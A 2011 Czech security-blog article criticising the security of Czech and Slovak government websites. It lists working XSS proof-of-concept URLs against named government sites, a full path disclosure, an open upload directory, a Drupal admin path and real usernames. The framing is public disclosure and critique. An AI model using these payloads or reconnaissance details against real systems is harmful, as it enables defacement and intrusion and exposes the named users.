Zabezpeční webů státní správy

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: .cCuMiNn.
Datum: 17.6.2011
Hodnocení/Hlasovalo: 1.44/36

O tom, že pořízení a provoz webových aplikací státní správy stojí daňové poplatníky nemalé peníze, není potřeba polemizovat. Zajímalo mě proto, jak jsou na tom se zabezpečením výsledné produkty.

Má procházka po webech státní správy si rozhodně nekladla za cíl odhalení všech zranitelných míst. Šlo opravdu jen o rychlé prolétnutí některýh webů a otestování nejčastějších zranitelných míst.

Pokud vás zajímá, jak si weby státní správy z pohledu bezpečnosti stojí, pak vězte, že to není žádná sláva. Dá se říci, že zabezpečení těchto webů je na stejné úrovni, jako bezpečnost jakéhokoliv jiného webu, který si někdo vytvoří doma na koleně.

Ukázka několika nalezených zranitelností

Web České daňové správy spadající pod Ministerstvo financí České republiky:
XSS (nakažení odkazů atributem onclick):
http://cds.mfcr.cz/cps/rde/xchg/cds/xsl/8765.html?year=%22%20onclick=%27alert%281%29%27%20xss=%22

XSS:
http://cds.mfcr.cz/cps/rde/xchg/cds/xsl/index.html/papp/cds_danovykalendar/?shift=next&month=6&year=2010%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

XSS (onmouseover): a SQL injection na webu statnisprava.cz
http://i.statnisprava.cz/?s_nazev=%22onmouseover%3D%22alert%28%27XSS%27%29&s_jmeno=&s_ic=&s_nar=&s_obec=&s_vedenou=&s_prspravce=&folt=0&pg=vysledky

Czechpoint.cz (převzato z Bugtracku [Emkei])
Použit je starý Drupal 5.7, který je nachylný na množství XSS, CSRF, HTML Injection a jiných útoků, dokonce i DOS
http://www.hack0wn.com/view.php?xroot=5.0&cat=exploits,
snadno naleznete FPD:
http://www.czechpoint.cz/web/?q=node/56&IDKRAJ=1&IDOKRES=0&DETAIL=NULL
a na celém serveru je povoleno listování adresářů. V upload složce tak lze najít množství nepublikovaných dat http://www.czechpoint.cz/web/files/.
Kdo zná Drupal, snadno si zjistí seznam modulů
http://www.czechpoint.cz/web/?q=/admin/build/modules
nebo uživatelů (matous, pavel, irena, vera, zkouska, jindrich, solar).

A aby si naši slovenští bratři nemysleli, že jsou na tom lépe:
http://www.employment.gov.sk/DIS/dis/index.php?SMC=1&id=%3Cinput%20type=image%20src=./%20onerror=alert%28/XSS/.source%29%3E
XSS (onmouseover)
http://www.employment.gov.sk/DIS/dis/index.php?sID=446af057d25b23212b9c89507e01fe63&mod=search_results&w=%22+type%3Dxss+onmouseover%3Dalert%28%2FXSS%2F.source%29%3B%2F%2F

Jsem přesvědčen o tom, že pokud by si případný útočník vzal za cíl některý z webů státní správy, nemusel by trávit příliš mnoho času nalézáním zranitelnosti, která by mu umožnila převléknout web do zcela nového kabátku. A takovéto weby mají na internetu reprezentovat Českou republiku...